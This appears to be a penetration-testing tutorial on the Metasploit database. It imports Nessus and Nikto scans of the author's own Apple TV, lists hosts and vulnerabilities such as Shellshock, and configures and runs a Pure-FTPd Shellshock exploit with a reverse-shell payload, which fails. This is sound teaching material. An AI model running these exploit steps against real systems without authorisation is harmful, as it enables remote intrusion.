Using the Metasploit database (advanced)

In my first tutorial I demonstrated the basic usage of the Metasploit database. This included how to use nmap from within the Metasploit console, importing nmap scans and also how to display information in it.Now we will look a bit deeper in what possibilities the Metasploit database can provide, and also see how it looks when importing database from other tools such as Nikto and Nessus. Those two tools are very popular. Nikto is used for scanning web applications and is free to use. Nessus comes in both a free version which is quite limited, but also a professional version that is quite powerful. In this demo, I will use the free version of Nessus and store the data in the Metasploit database.Below you see the syntax for importing a previously saved Nessus scan result file into Metasploit. The Nessus file must be in the nessus format for Metasploit to be able to import it. In this example, I have done a credential scan of my jailbraked Apple TV just to highlight some of the vulnerabilities we can find with a Nessus scan.First we switch to the test workspace from the basic tutorial where we already have some data stored.msf > workspace test[*] Workspace: testmsf >Then we do the import from Nessus.msf > db_import /root/Downloads/Apple_TV_scan_g5sugv.nessus[*] Importing 'Nessus XML (v2)' data[*] Importing host 192.168.1.11[*] Successfully imported /root/Downloads/Apple_TV_scan_g5sugv.nessusmsf >It is also possible to initialise Nessus scan from within Metasploit but that requires you to know the specific ID of the scan which you must have created within Nessus prior to calling Nessus from within Metasploit. So for this tutorial, I will stick with importing a Nessus scan.If we run the hosts command again we now see the following:msf > hostsHosts=====address       mac                name            os_name   os_flavor  os_sp  purpose  info  comments-------       ---                ----            -------   ---------  -----  -------  ----  --------192.168.1.1   08:63:61:8e:8f:4e  homerouter.cpe  Unknown                     device192.168.1.3   90:72:40:04:88:4b                  Unknown                     device192.168.1.11  b8:17:c2:c9:7e:b5  192.168.1.11    Mac OS X                    devicemsf >We have one more host, 192.168.1.11 which is my Apple TV box.If we run services we see:msf > servicesServices========host          port   proto  name              state     info----          ----   -----  ----              -----     ----192.168.1.1   22     tcp    ssh               open192.168.1.1   8081   tcp    blackice-icecap   filtered192.168.1.1   23     tcp    telnet            filtered192.168.1.1   53     tcp    domain            open192.168.1.1   80     tcp    http              open192.168.1.1   443    tcp    https             open192.168.1.1   631    tcp    ipp               filtered192.168.1.1   3000   tcp    ppp               open192.168.1.3   445    tcp    microsoft-ds      open192.168.1.3   548    tcp    afp               open192.168.1.3   139    tcp    netbios-ssn       open192.168.1.3   10000  tcp    snet-sensor-mgmt  open192.168.1.3   5009   tcp    airport-admin     open192.168.1.11  5353   udp    mdns              open192.168.1.11  3689   tcp    www               open192.168.1.11  5000   tcp    rtsp              open192.168.1.11  7000   tcp    www               open192.168.1.11  7100   tcp    www               open192.168.1.11  22     tcp    ssh               open192.168.1.11  9777   udp                      open192.168.1.11  123    udp                      open192.168.1.11  62078  tcp                      open192.168.1.11  63907  udp                      openmsf >Now we can use the vulns command to see if there are any vulnerabilities that Nessus found and now are included in our Metasploit database. As this is the case with my Apple TV, I will only list some.msf > vulns [*] Time: 2015-08-30 07:57:06 UTC Vuln: host=192.168.1.11 name=Backported Security Patch Detection (SSH) refs=NSS-39520[*] Time: 2015-08-30 07:57:06 UTC Vuln: host=192.168.1.11 name=Common Platform Enumeration (CPE) refs=NSS-45590[*] Time: 2015-08-30 07:57:07 UTC Vuln: host=192.168.1.11 name=Mac OS X < 10.10 Multiple Vulnerabilities refs=CVE-2011-2391[*] Time: 2015-08-30 07:57:07 UTC Vuln: host=192.168.1.11 name=Bash Remote Code Execution (CVE-2014-6277 / CVE-2014-6278) (Shellshock) refs=CVE-2014-6277,CVE-2014-6278,BID-70165,BID-70166,OSVDB-112158,OSVDB-112169,CERT-252743,IAVA-2014-A-0142,EDB-ID-34860,MSF-CUPS Filter Bash Environment Variable Code Injection,NSS-78067[*] Time: 2015-08-30 07:57:07 UTC Vuln: host=192.168.1.11 name=Device Type refs=NSS-54615[*] Time: 2015-08-30 07:57:07 UTC Vuln: host=192.168.1.11 name=OS Identification refs=NSS-11936[*] Time: 2015-08-30 07:57:07 UTC Vuln: host=192.168.1.11 name=Bash Remote Code Execution (Shellshock) refs=CVE-2014-6271,BID-70103,OSVDB-112004,EDB-ID-34765,IAVA-2014-A-0142,EDB-ID-34766,MSF-Pure-FTPd External Authentication Bash Environment Variable Code Injection,NSS-77823[*] Time: 2015-08-30 07:57:07 UTC Vuln: host=192.168.1.11 name=Time of Last System Startup refs=NSS-56468[*] Time: 2015-08-30 07:57:07 UTC Vuln: host=192.168.1.11 name=Ethernet Card Manufacturer Detection refs=NSS-35716[*] Time: 2015-08-30 07:57:07 UTC Vuln: host=192.168.1.11 name=Bash Incomplete Fix Remote Code Execution Vulnerability (Shellshock) refs=CVE-2014-7169,BID-70137,OSVDB-112004,CERT-252743,IAVA-2014-A-0142,EDB-ID-34765,EDB-ID-34766,EDB-ID-34777,MSF-Pure-FTPd External Authentication Bash Environment Variable Code Injection,NSS-78385[*] Time: 2015-08-30 07:57:07 UTC Vuln: host=192.168.1.11 name=Authenticated Check : OS Name and Installed Package Enumeration refs=NSS-12634[*] Time: 2015-08-30 07:57:07 UTC Vuln: host=192.168.1.11 name=HyperText Transfer Protocol (HTTP) Information refs=NSS-24260[*] Time: 2015-08-30 07:57:07 UTC Vuln: host=192.168.1.11 name=HyperText Transfer Protocol (HTTP) Information refs=NSS-24260[*] Time: 2015-08-30 07:57:07 UTC Vuln: host=192.168.1.11 name=Apple TV < 7.0.3 Multiple Vulnerabilities refs=CVE-2014-3192[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=Apple TV Detection refs=NSS-42825[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=Apple iTunes Music Sharing Enabled refs=NSS-20217[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=HTTP Server Type and Version refs=NSS-10107[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=RTSP Server Type / Version Detection refs=NSS-10762[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=Default Password (alpine) for 'root' Account refs=CVE-1999-0502,MSF-SSH User Code Execution,NSS-42367[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=SSH Protocol Versions Supported refs=NSS-10881[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=SFTP Supported refs=NSS-72663[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=SSH Weak MAC Algorithms Enabled refs=NSS-71049[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=SSH Server CBC Mode Ciphers Enabled refs=CVE-2008-5161,BID-32319,OSVDB-50035,OSVDB-50036,CERT-958563,CWE-200,NSS-70658[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=SSH Algorithms and Languages Supported refs=NSS-70657[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=SSH Server Type and Version Information refs=NSS-10267[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=Service Detection (HELP Request) refs=NSS-11153[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=Service Detection refs=NSS-22964[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=Service Detection refs=NSS-22964[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=Service Detection refs=NSS-22964[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=Service Detection refs=NSS-22964[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=Service Detection refs=NSS-22964[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=mDNS Detection (Local Network) refs=NSS-66717[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=Traceroute Information refs=NSS-10287[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=TCP/IP Timestamps Supported refs=NSS-25220[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=Netstat Connection Information refs=NSS-64582[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=Netstat Active Connections refs=NSS-58651[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=netstat portscanner (SSH) refs=NSS-14272[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=netstat portscanner (SSH) refs=NSS-14272[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=netstat portscanner (SSH) refs=NSS-14272[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=netstat portscanner (SSH) refs=NSS-14272[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=netstat portscanner (SSH) refs=NSS-14272[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=netstat portscanner (SSH) refs=NSS-14272[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=netstat portscanner (SSH) refs=NSS-14272[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=netstat portscanner (SSH) refs=NSS-14272[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=netstat portscanner (SSH) refs=NSS-14272[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=netstat portscanner (SSH) refs=NSS-14272msf >As you can see, there are several and they are all related to the Apple TV I scanned with Nessus and imported the result into the Metasploit database. Vulnerabilities are of course very interesting and some of these might be able to exploit which is what Metasploit is all about. One thing to note here is the advantage to use multiple tools to find information and then store that data into Metasploit which is the premier attack tool for exploiting machines. In a sense, we get the best of two worlds.Just as I said I would I also import my Nikto scan. Remember, you have to save your Nikto scan in XML format for Metasploit to be able to import it.msf > db_import /root/nikto.xml[*] Importing 'Nikto XML' data[*] Importing host 192.168.1.1[*] Successfully imported /root/nikto.xmlmsf >Unfortunately, Nikto was unable to detect any vulnerabilities in my web application so the vulnerabilities I listed below are the ones we can play with.I will also mention that both the hosts and services command have several flags you can play with, allowing you to add a host (-a) and delete a host (-d). The help command allows you to see all the flags for a particular command as seen below.msf > help hostsUsage: hosts [ options ] [addr1 addr2 ...]OPTIONS:-a,--add          Add the hosts instead of searching-d,--delete       Delete the hosts instead of searching-c <col1,col2>    Only show the given columns (see list below)-h,--help         Show this help information-u,--up           Only show hosts which are up-o <file>         Send output to a file in csv format-R,--rhosts       Set RHOSTS from the results of the search-S,--search       Search string to filter by-i,--info         Change the info of a host-n,--name         Change the name of a host-m,--comment      Change the comment of a host-t,--tag          Add or specify a tag to a range of hostsAvailable columns: address, arch, comm, comments, created_at, cred_count, detected_arch, exploit_attempt_count, host_detail_count, info, mac, name, note_count, os_flavor, os_lang, os_name, os_sp, purpose, scope, service_count, state, updated_at, virtual_host, vuln_count, tagsmsf >If we go back to out vulnerabilties we can also use the vulns command to search for specific vulnerabilities such as the infamous Shellshock vulnerability which was listed. We use the -S parameter with the vulns command as seen below. This only lists the vulnerabilties where “Shellshock” is listed.msf > vulns -S shellshock[*] Time: 2015-08-30 07:57:07 UTC Vuln: host=192.168.1.11 name=Bash Remote Code Execution (CVE-2014-6277 / CVE-2014-6278) (Shellshock) refs=CVE-2014-6277,CVE-2014-6278,BID-70165,BID-70166,OSVDB-112158,OSVDB-112169,CERT-252743,IAVA-2014-A-0142,EDB-ID-34860,MSF-CUPS Filter Bash Environment Variable Code Injection,NSS-78067[*] Time: 2015-08-30 07:57:07 UTC Vuln: host=192.168.1.11 name=Bash Remote Code Execution (Shellshock) refs=CVE-2014-6271,BID-70103,OSVDB-112004,EDB-ID-34765,IAVA-2014-A-0142,EDB-ID-34766,MSF-Pure-FTPd External Authentication Bash Environment Variable Code Injection,NSS-77823[*] Time: 2015-08-30 07:57:07 UTC Vuln: host=192.168.1.11 name=Bash Incomplete Fix Remote Code Execution Vulnerability (Shellshock) refs=CVE-2014-7169,BID-70137,OSVDB-112004,CERT-252743,IAVA-2014-A-0142,EDB-ID-34765,EDB-ID-34766,EDB-ID-34777,MSF-Pure-FTPd External Authentication Bash Environment Variable Code Injection,NSS-78385msf >In our next step, lets search the Metasploit exploit library to find a match. We use the builtin search command for this. As you can see, we get three matches.msf > search shellshockMatching Modules================Name                                      Disclosure Date  Rank       Description----                                      ---------------  ----       -----------auxiliary/server/dhclient_bash_env        2014-09-24       normal     DHCP Client Bash Environment Variable Code Injectionexploit/multi/ftp/pureftpd_bash_env_exec  2014-09-24       excellent  Pure-FTPd External Authentication Bash Environment Variable Code Injectionexploit/multi/http/cups_bash_env_exec     2014-09-24       good       CUPS Filter Bash Environment Variable Code Injectionmsf >If you look closely you see that there is a PureFTPd bash exploit that is rated excellent and which also is listed a vulnerability from our previous search. This looks like a splendid candidate to try and exploit.That brings us to the last step for this tutorial, to load data into the exploit settings directly from the information in the Metasploit database.First, we select the PureFTPd exploit.msf > use exploit/multi/ftp/pureftpd_bash_env_execmsf exploit(pureftpd_bash_env_exec) >We look at the options for this exploit and notice that we need to set the RHOST. This can be done by querying the Metasploit database.msf exploit(pureftpd_bash_env_exec) > show optionsModule options (exploit/multi/ftp/pureftpd_bash_env_exec):Name   Current Setting  Required  Description----   ---------------  --------  -----------RHOST                   yes       The target addressRPATH  /bin             yes       Target PATH for binaries used by the CmdStagerRPORT  21               yes       The target portExploit target:Id  Name--  ----0   Linux x86msf exploit(pureftpd_bash_env_exec) >Lets see if we can find the Apple TV machine in our database. With this exploit, you can see that there is no RHOSTS variable, only a RHOST variable. So, in this case it will not be possible to use -R flag with the hosts command to populate the RHOST variable with the search result. Many auxiliary modules do support the RHOSTS variable where this would work.Example below of setting the RHOSTS variable.msf exploit(pureftpd_bash_env_exec) > hosts -S Mac -RHosts=====address       mac                name          os_name   os_flavor  os_sp  purpose  info  comments-------       ---                ----          -------   ---------  -----  -------  ----  --------192.168.1.11  b8:17:c2:c9:7e:b5  192.168.1.11  Mac OS X                    deviceRHOSTS => 192.168.1.11msf exploit(pureftpd_bash_env_exec) >However, using show options below do verify that the RHOST variable is not set as the command above is only possible when the RHOSTS variable is available. Unfortunately Metasploit will not output an error but instead simply output RHOSTS variable being set. So, always make sure to use show options to check that all your variables has been set.msf exploit(pureftpd_bash_env_exec) > show optionsModule options (exploit/multi/ftp/pureftpd_bash_env_exec):Name   Current Setting  Required  Description----   ---------------  --------  -----------RHOST                    yes       The target addressRPATH  /bin             yes       Target PATH for binaries used by the CmdStagerRPORT  21               yes       The target portPayload options (generic/shell_reverse_tcp):Name   Current Setting  Required  Description----   ---------------  --------  -----------LHOST  192.168.1.6      yes       The listen addressLPORT  4444             yes       The listen portExploit target:Id  Name--  ----0   Linux x86msf exploit(pureftpd_bash_env_exec) >So, we set the RHOST variable manually and run show options again.msf exploit(pureftpd_bash_env_exec) > set RHOST 192.168.1.11RHOST => 192.168.1.11msf exploit(pureftpd_bash_env_exec) > show optionsModule options (exploit/multi/ftp/pureftpd_bash_env_exec):Name   Current Setting  Required  Description----   ---------------  --------  -----------RHOST  192.168.1.11     yes       The target addressRPATH  /bin             yes       Target PATH for binaries used by the CmdStagerRPORT  21               yes       The target portPayload options (generic/shell_reverse_tcp):Name   Current Setting  Required  Description----   ---------------  --------  -----------LHOST  192.168.1.6      yes       The listen addressLPORT  4444             yes       The listen portExploit target:Id  Name--  ----0   Linux x86msf exploit(pureftpd_bash_env_exec) >OK, all set. If we are happy with the default payload we can simply execute the exploit attempt by entering either exploit or run.msf exploit(pureftpd_bash_env_exec) > run[*] Started reverse handler on 192.168.1.6:4444[-] Exploit aborted due to failure: bad-config: 192.168.1.11:21 - Failed to store payload inside executable, please select a native payloadThat did not work, and a little research tells us that there is a problem with the default payload option. So we select another payload an try to run the exploit again.msf exploit(pureftpd_bash_env_exec) > set PAYLOAD linux/x86/shell_reverse_tcpPAYLOAD => linux/x86/shell_reverse_tcpmsf exploit(pureftpd_bash_env_exec) > run[*] Started reverse handler on 192.168.1.6:4444[-] Exploit failed [unreachable]: Rex::ConnectionRefused The connection was refused by the remote host (192.168.1.11:21).msf exploit(pureftpd_bash_env_exec) >Unfortunately it fails. Sometimes it is not as easy to exploit a machine as it might appear. Vulnerability scanners such as Nessus might be wrong, and exploits might fail.Never the less, there is a great advantage in using the Metasploit database as a store for information you collect with other tools. Hopefully I have demonstrated some of the benefits of using the Metasploit database. There are things I have not demonstrated yet so feel free to really explore the different options with the Metasploit database.I will leave you with two things. The first is -o flag which you can use with several of the database commands in Metasploit, you can try with services -o and hosts -o. This allows you to export data in CSV format which can be valuable. The last thing is the help command. Simply type help and you will get a list of all available commands, here is the section for the Metasploit database.Database Backend Commands=========================Command           Description-------           -----------creds             List all credentials in the databasedb_connect        Connect to an existing databasedb_disconnect     Disconnect from the current database instancedb_export         Export a file containing the contents of the databasedb_import         Import a scan result file (filetype will be auto-detected)db_nmap           Executes nmap and records the output automaticallydb_rebuild_cache  Rebuilds the database-stored module cachedb_status         Show the current database statushosts             List all hosts in the databaseloot              List all loot in the databasenotes             List all notes in the databaseservices          List all services in the databasevulns             List all vulnerabilities in the databaseworkspace         Switch between database workspacesThe only thing that remains is to say Good Luck in using the Metasploit database.